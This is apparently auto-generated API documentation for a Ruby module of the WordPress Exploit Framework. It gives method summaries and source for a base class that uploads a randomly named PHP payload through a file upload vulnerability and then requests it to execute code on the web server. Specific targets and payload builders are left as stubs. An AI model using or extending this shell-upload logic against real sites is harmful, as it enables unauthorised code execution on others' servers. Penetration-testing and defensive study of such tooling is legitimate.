Module: Wpxf::WordPress::ShellUpload

Includes:
Wpxf
Defined in:
lib/wpxf/wordpress/shell_upload.rb

Overview

Provides reusable functionality for shell upload modules.

Instance Method Summary collapse

Instance Method Details

#before_uploadBoolean

Called prior to preparing and uploading the payload.

Returns:

  • (Boolean)

    true if no errors occurred.



67
68
69
# File 'lib/wpxf/wordpress/shell_upload.rb', line 67

def before_upload
  true
end

#execute_payload(payload_url) ⇒ HttpResponse

Execute the payload at the specified address.

Parameters:

  • payload_url (String)

    the payload URL to access.

Returns:

  • (HttpResponse)

    the HTTP response of the request to the payload URL.



116
117
118
119
120
# File 'lib/wpxf/wordpress/shell_upload.rb', line 116

def execute_payload(payload_url)
  res = execute_get_request(url: payload_url, cookie: @session_cookie)
  emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
  res
end

#expected_upload_response_codeInteger

Returns the response code to expect from a successful upload operation.

Returns:

  • (Integer)

    the response code to expect from a successful upload operation.



72
73
74
# File 'lib/wpxf/wordpress/shell_upload.rb', line 72

def expected_upload_response_code
  200
end

#initializeObject

Initialize a new instance of Wpxf::WordPress::ShellUpload



8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# File 'lib/wpxf/wordpress/shell_upload.rb', line 8

def initialize
  super

  @session_cookie = nil
  @upload_result = nil
  @payload_name = nil

  _update_info_without_validation(
    desc: %(
      This module exploits a file upload vulnerability
      which allows users to upload and execute PHP
      scripts in the context of the web server.
    )
  )

  register_advanced_options([
    IntegerOption.new(
      name: 'payload_name_length',
      desc: 'The number of characters to use when generating the payload name',
      required: true,
      default: rand(5..10),
      min: 1,
      max: 256
    )
  ])
end

#payload_body_builderBodyBuilder

Returns the Utility::BodyBuilder used to generate the uploader form.

Returns:



51
52
53
# File 'lib/wpxf/wordpress/shell_upload.rb', line 51

def payload_body_builder
  nil
end

#payload_nameString

Returns the file name of the payload, including the file extension.

Returns:

  • (String)

    the file name of the payload, including the file extension.



41
42
43
# File 'lib/wpxf/wordpress/shell_upload.rb', line 41

def payload_name
  @payload_name
end

#payload_name_extensionString

Returns the extension type to use when generating the payload name.

Returns:

  • (String)

    the extension type to use when generating the payload name.



82
83
84
# File 'lib/wpxf/wordpress/shell_upload.rb', line 82

def payload_name_extension
  'php'
end

#possible_payload_upload_locationsArray

Returns an array of possible locations that the payload could have been uploaded to.

Returns:

  • (Array)

    an array of possible locations that the payload could have been uploaded to.



61
62
63
# File 'lib/wpxf/wordpress/shell_upload.rb', line 61

def possible_payload_upload_locations
  nil
end

#runBoolean

Run the module.

Returns:

  • (Boolean)

    true if successful.



88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# File 'lib/wpxf/wordpress/shell_upload.rb', line 88

def run
  return false unless super
  return false unless before_upload

  emit_info 'Preparing payload...'
  @payload_name = "#{Utility::Text.rand_alpha(_payload_name_length)}.#{payload_name_extension}"
  builder = payload_body_builder
  return false unless builder

  emit_info 'Uploading payload...'
  return false unless _upload_payload(builder)

  emit_info 'Executing the payload...'
  _validate_and_prepare_upload_locations.each do |payload_url|
    break if execute_payload(payload_url)&.code != 404
  end

  true
end

#timestamp_range_adjustment_valueInteger

Returns the number of seconds to adjust the upload timestamp range start and end values by.

Returns:

  • (Integer)

    the number of seconds to adjust the upload timestamp range start and end values by.



123
124
125
# File 'lib/wpxf/wordpress/shell_upload.rb', line 123

def timestamp_range_adjustment_value
  10
end

#upload_request_paramsHash

Returns the query string parameters to use when submitting the upload request.

Returns:

  • (Hash)

    the query string parameters to use when submitting the upload request.



77
78
79
# File 'lib/wpxf/wordpress/shell_upload.rb', line 77

def upload_request_params
  nil
end

#upload_resultHttpResponse?

Returns the Net::HttpResponse of the upload operation.

Returns:



36
37
38
# File 'lib/wpxf/wordpress/shell_upload.rb', line 36

def upload_result
  @upload_result
end

#upload_timestamp_rangeArray

Returns the range of possible timestamps that could have been used when the payload reached the target.

Returns:

  • (Array)

    the range of possible timestamps that could have been used when the payload reached the target.



128
129
130
# File 'lib/wpxf/wordpress/shell_upload.rb', line 128

def upload_timestamp_range
  (@start_timestamp - timestamp_range_adjustment_value)..(@end_timestamp + timestamp_range_adjustment_value)
end

#uploaded_payload_locationString

Returns the URL of the payload after it is uploaded to the target.

Returns:

  • (String)

    the URL of the payload after it is uploaded to the target.



56
57
58
# File 'lib/wpxf/wordpress/shell_upload.rb', line 56

def uploaded_payload_location
  nil
end

#uploader_urlString

Returns the URL of the file used to upload the payload.

Returns:

  • (String)

    the URL of the file used to upload the payload.



46
47
48
# File 'lib/wpxf/wordpress/shell_upload.rb', line 46

def uploader_url
  nil
end

#validate_upload_resultBoolean

Returns true if the result of the upload operation is valid.

Returns:

  • (Boolean)

    true if the result of the upload operation is valid.



109
110
111
# File 'lib/wpxf/wordpress/shell_upload.rb', line 109

def validate_upload_result
  true
end